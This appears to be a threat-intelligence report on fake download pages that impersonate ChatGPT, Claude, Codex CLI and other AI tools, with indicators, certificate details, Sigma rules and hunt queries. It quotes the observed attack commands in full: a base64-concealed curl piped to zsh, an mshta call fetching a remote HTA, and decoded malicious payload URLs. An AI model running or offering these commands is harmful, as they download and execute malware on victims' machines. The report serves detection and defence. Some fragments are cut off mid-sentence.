Software Impersonation Infrastructure
Detection Chokepoint Framework
Every masquerading delivery campaign follows the same chain. The brand changes. The lure page changes. The payload host rotates. But the prerequisites don't: the adversary must register infrastructure, build a convincing lure, stage a payload, and get the victim to execute something. Perfect visual impersonation neutralizes user-facing trust signals - your detection budget belongs at execution and infrastructure layers.
Infrastructure Patterns Across Hunts
Active Campaigns (Hunt Intelligence)
Validated hunts from the de-intel-pipeline. Each object passed schema, citation, and source-diversity validation before promotion to hunts/.
ChatGPT-Impersonation-MROScanner-Installer - Phishing / lure page, EXE download, CDN staging, Code signing abuse, Favicon pivot
chatgpt-windows.com · app-update-chatgpt.com
Claude-Code-Impersonation-ClickFix-Install-Modal - Phishing / lure page, mshta HTA, curl | shell, Obfuscation, Favicon pivot
uneifoifow-3ndfskq.pages.dev · too.clawddddd.com · fine-byte2.com · download.version-516.com
LM-Studio-Domain-Squatting-API-Endpoint-Impersonation - Brand masquerade, Phishing / lure page
lmstudio.co.com · www.api.lmstudio.co.com
Notion-Masquerade-Delivery-Survey - Survey / squat only
notiondownload.com
OpenAI-Codex-CLI-Domain-Squatting-Credential-Harvest - Brand masquerade, Phishing / lure page
codex-cli.org · codexhub.click · codexcli.homes · codexcli.gr.com
Brand Impersonation Matrix
| Brand | Campaigns | Delivery methods | Confirmed delivery |
|---|---|---|---|
| ChatGPT / OpenAI | 1 | CDN staging; Code signing abuse; EXE download; Favicon pivot; Phishing / lure page | Yes |
| Claude / Anthropic | 1 | Favicon pivot; Obfuscation; Phishing / lure page; curl | shell; mshta HTA | Yes |
| LM Studio | 1 | Brand masquerade; Phishing / lure page | No |
| Notion | 1 | Survey / squat only | No |
| OpenAI Codex CLI | 1 | Brand masquerade; Phishing / lure page | No |
ChatGPT Impersonation - MROScanner OU Installer
A fake "ChatGPT for Windows" download page (chatgpt-windows.com) on Oracle Cloud serves a 2.3 MB Inno Setup installer signed by Estonian shell company MROScanner OU. Download is JS-gated - no static link in HTML - with Windows-only UA fingerprinting and per-visitor affiliate tracking via a PHP backend. Payload staged on BunnyCDN.
POST /init/tracking.php
→ returns per-visitor URL: https://app-cg.b-cdn.net/ChatGPT_Installer.exe?hash=<token>
ChatGPT_Installer.exe
SHA-256: 17dc646d645252196a19e87752fa21dbe7b626cd71a9dacddebd9a2ed8f1e16e
Signer: MROScanner OU (SSL.com, thumbprint E3B6CF11...)
E3B6CF11... appears on every binary this operator signs until revocation (valid until April 2027). The domain rotates. The CDN bucket name rotates. The cert thumbprint does not. Monitor VT/Hunt.io for new hits on this signer.
/init/tracking.php. Non-Windows user-agents get "Unsupported System" - further reducing scanner noise and narrowing the victim pool to paid malvertising traffic (UTM params: fbclid, bid, tid).
| Signal | Durability | Notes |
|---|---|---|
| chatgpt-windows.com | Medium | 3-year squatter history; repurposed May 2026 |
| app-cg.b-cdn.net | Low | CDN bucket - hash the binary when sandbox completes |
| MROScanner OU cert | High | Pivot on thumbprint across VT/Hunt.io |
| /init/tracking.php | Medium | Same PHP structure links sibling campaigns |
Claude Code - ClickFix Install Modal
Three fake "Download Claude" pages clone claude.com and present a fake install modal. Mac victims run a base64-concealed curl | zsh command; Windows victims run mshta https://download.version-516.com/claude. The kit predates Claude targeting - /other path was active 12 days before /claude.
# Mac - social cover echo, then malicious curl
echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo '<base64>' | openssl base64 -d -A) | zsh
# Windows - HTA via signed LOLBin
mshta https://download.version-516.com/claude
xprssit.com vs ewabeniak.com).
claude-custom-tracking.js from www.anthropic.com. Victim traffic blends into legitimate claude.com analytics noise - a subtle signal worth monitoring if you correlate page views with actual installs.
| Domain | Role |
|---|---|
| uneifoifow-3ndfskq.pages.dev | Cloudflare Pages lure; Mac payload via xprssit.com |
| too.clawddddd.com | Typosquat lure; Mac payload via ewabeniak.com |
| download.version-516.com | Shared Windows HTA host (/claude, /other) |
| xprssit.com / ewabeniak.com | Per-site Mac shell script delivery (/curl/<hash>) |
OpenAI Codex CLI - Domain Squatting
Multiple domains registered within weeks of the Codex CLI public launch (April 2026) squat the exact product name. No confirmed binary delivery - credential harvest and SEO poisoning targeting developers who search for install instructions instead of using npm install -g @openai/codex.
| Domain | Status | Pattern |
|---|---|---|
| codex-cli.org | Phishing-tagged; dormant empty HTML | Squats npm package name |
| codexhub.click | Vietnamese Codex CLI page + /login | Credential harvest suspected |
| codexcli.homes | SSL cipher mismatch - conditional serving | Geo/IP gated content |
| codexcli.gr.com | 404 at scan time | Dormant squat infrastructure |
LM Studio - API Endpoint Impersonation
lmstudio.co.com redirects to www.api.lmstudio.co.com, impersonating the LM Studio local API server (normally localhost:1234). No installer delivery - threat is prompt exfiltration or API key theft via a misconfigured client endpoint string.
api.lmstudio.co.com is indistinguishable from a legitimate remote LM Studio endpoint in a config string. Watch for this pattern on Ollama (localhost:11434), Jan.ai, AnythingLLM. DNS was pulled by May 11, 2026 after community phishing reports.
Notion Coverage Survey
Favicon pivot for Notion returned 5,692 non-Notion hits - structurally too noisy because Notion is used as a CMS backend by thousands of legitimate sites. No active Windows/Mac delivery campaign detected in the last 90 days. Only finding: notiondownload.com (Android APK squatter, Hostinger).
filename:*.exe) requires a URLScan API key. Title pivots and domain-pattern queries are the fallback when favicon hash pivots produce unusable noise.
Cross-Campaign Operator Comparison
Two distinct delivery philosophies emerged from the May 2026 hunt window - traditional EXE distribution vs. paste-to-run developer targeting.
| MROScanner OU (ChatGPT) | ClickFix Install Modal (Claude) | |
|---|---|---|
| Delivery | EXE download (JS-gated) | Paste-to-run command |
| File on disk | Yes - Inno Setup installer | No file for primary vector |
| Code signing | Shell-company Authenticode | Not applicable |
| OS targeting | Windows only (UA filter) | Mac + Windows (separate commands) |
| Obfuscation | BunnyCDN + per-visitor hash | Base64 URL in JS + domain rotation |
| Infrastructure | Oracle Cloud dedicated VM | Cloudflare Pages (ephemeral) |
| Traffic model | Paid malvertising (UTM tracking) | Real brand analytics loaded |
| Kit reuse | Unknown | Confirmed multi-brand (/other path) |
| Sophistication | Medium | Medium-high |
MITRE Technique Frequency (Hunts)
| Technique | Label | Hunts |
|---|---|---|
| T1566.002 | Phishing / lure page | 4 |
| T1036.005 | Brand masquerade | 2 |
| T1204.002 | EXE download | 1 |
| T1102 | CDN staging | 1 |
| T1553.002 | Code signing abuse | 1 |
| T1218.005 | mshta HTA | 1 |
| T1059.004 | curl | shell | 1 |
| T1027 | Obfuscation | 1 |
Aggregate Pipeline Data
IOC-first pipeline records from confirmed payload reports and infrastructure hunts. Delivery chains shown only when URLScan captured the redirect sequence.
Payload Class Breakdown
Confirmed Delivery Domains (sample)
| Domain | IP | Class | First seen |
|---|---|---|---|
| salesteamrealtors.com | - | unknown | 2026-03-22 |
| www.thesalesteam.ca | - | unknown | 2026-03-22 |
| steamunlock.site | - | unknown | 2026-03-22 |
| uszoomwebhost.live | - | unknown | 2026-03-22 |
| wildcard.steam-machine.com | - | unknown | 2026-03-22 |
| tryclearsteam.com | - | unknown | 2026-03-22 |
| wpdevsteam.com | - | unknown | 2026-03-22 |
| www1.blockchainchatgpt.com | - | unknown | 2026-03-22 |
| dlads.discordl.org | - | unknown | 2026-03-22 |
| support.zoom.us.id.xstore1.cloud | - | unknown | 2026-03-22 |
| dev.eu.as.eu.discord.tattoo | - | unknown | 2026-03-22 |
| alcalc.discordian.ca | - | unknown | 2026-03-22 |
| www.app.steamlevelu.com | - | unknown | 2026-03-22 |
| steamboatweddingday.com | - | unknown | 2026-03-22 |
| staging.wwwapp.admin.discord.tattoo | - | unknown | 2026-03-22 |
Favicon Clusters
| Hash | Domains | Sample |
|---|---|---|
| 100 | ||
| 5 | ||
| 1 | ||
| 1 |
Weekly Volume
Detection Recommendations
Each recommendation maps to the ATT&CK technique it detects. Execution-layer rules survive brand rotation; domain blocklists do not.
Example detection logic
title: Masqueraded Installer OriginalFilename Mismatch
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\ChatGPT_Installer.exe'
- '\ZoomInstaller.exe'
- '\DiscordSetup.exe'
CurrentDirectory|contains:
- '\Downloads\'
- '\AppData\Local\Temp\'
filter_legit:
OriginalFileName|contains:
- 'ChatGPT'
- 'Zoom'
- 'Discord'
condition: selection and not filter_legit
level: high
Observed signers (1)
ChatGPT_Installer.exe
Signer: MROScanner OU (Tallinn, EE)
CA: SSL.com Code Signing Intermediate CA RSA R1
Thumbprint: E3B6CF111525417CE68C1CBE99E257DBAC54D071
Valid: 2026-04-22 to 2027-04-21
Example detection logic
title: Signed Installer Executed From Downloads After Browser Spawn
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith:
- '\chrome.exe'
- '\msedge.exe'
- '\firefox.exe'
selection_installer:
Image|endswith:
- '\setup.exe'
- '\installer.exe'
- '\install.exe'
CurrentDirectory|contains: '\Downloads\'
Signed: 'true'
filter_known_vendors:
SignatureStatus: 'Valid'
Signature|contains:
- 'Microsoft'
- 'Google'
- 'Zoom'
condition: selection_parent and selection_installer and not filter_known_vendors
level: high
mshta.exe spawned from cmd.exe, Run dialog, or terminal context fetching an HTA from an external domain. Covers Claude Code ClickFix Windows delivery via download.version-516.com/claude.Observed payloads (1)
mshta https://download.version-516.com/claude
Example detection logic
title: Mshta Executing Remote HTA From Unusual Parent
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\mshta.exe'
CommandLine|contains:
- 'http://'
- 'https://'
selection_parent:
ParentImage|endswith:
- '\cmd.exe'
- '\explorer.exe'
- '\WindowsTerminal.exe'
filter_enterprise:
CommandLine|contains:
- '.microsoft.com'
- '.windows.com'
condition: selection and selection_parent and not filter_enterprise
level: high
curl -s ... | zsh or curl ... | bash where the URL domain is not a known package manager or vendor CDN. Claude Code install modal uses base64-concealed curl URLs on attacker-controlled domains.Observed payloads (2)
# Social cover echo + malicious curl (Mac)
echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo '<base64>' | openssl base64 -d -A) | zsh
# Decoded payload URL (uneifoifow variant)
https://xprssit.com/curl/6df71b43667a2d1d9de3e88cba7e16fb11b4ddf67af64b853b903b3fa8ead500
Example detection logic
title: Curl Piped to Shell From Non-Vendor Domain
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith:
- '/curl'
- '/zsh'
- '/bash'
CommandLine|contains|all:
- 'curl'
- '|'
filter_vendors:
CommandLine|contains:
- 'anthropic.com'
- 'homebrew.sh'
- 'github.com'
condition: selection and not filter_vendors
level: high
Example hunt queries
# URLScan favicon pivot (ChatGPT)
hash:9747c13cd87b36ebf2ab567b9d0bc2ff49b5a4f46f4f51e4d053024f579fb9a0 AND NOT page.domain:openai.com
# URLScan favicon pivot (Claude)
hash:816a55828befeb50fe8a9556cb92d80194efefbd3f4e04ccf694992dd8e085e3 AND NOT page.domain:claude.ai
# Shodan
http.favicon.hash:<mmh3_int>
/init/tracking.php + /init/pixel.php endpoint pattern with UTM parameters (fbclid, bid, tid) indicates a paid traffic malvertising campaign. If this PHP structure reappears on another fake download page, it connects campaigns to the same kit or operator.Example detection logic
# Proxy / DNS - hunt for sibling sites
cs-uri-stem: '/init/tracking.php'
cs-method: 'POST'
cs-uri-query|contains:
- 'utm_source='
- 'fbclid='
# URLScan pivot
page.url:"/init/tracking.php" AND filename:*.exe